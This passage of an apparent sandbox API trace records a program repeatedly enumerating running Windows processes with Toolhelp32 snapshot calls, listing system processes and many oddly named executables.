szExeFile="svchost.exe")) returned 1 [0110.383] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.385] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.386] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.387] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.388] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.389] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.390] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0110.391] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.392] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.394] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.395] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.396] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.397] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.398] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.399] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.402] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.403] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.404] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.406] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.415] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0110.419] CloseHandle (hObject=0xbc) returned 1 [0110.419] Sleep (dwMilliseconds=0x12c) [0110.722] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.727] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.728] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0110.728] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.729] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.730] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.730] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.731] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.732] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.733] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0110.733] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.734] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.735] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.735] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.736] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.737] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.737] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0110.738] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.739] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.739] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0110.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.762] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.774] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.776] CloseHandle (hObject=0xc4) returned 1 [0110.776] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.780] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 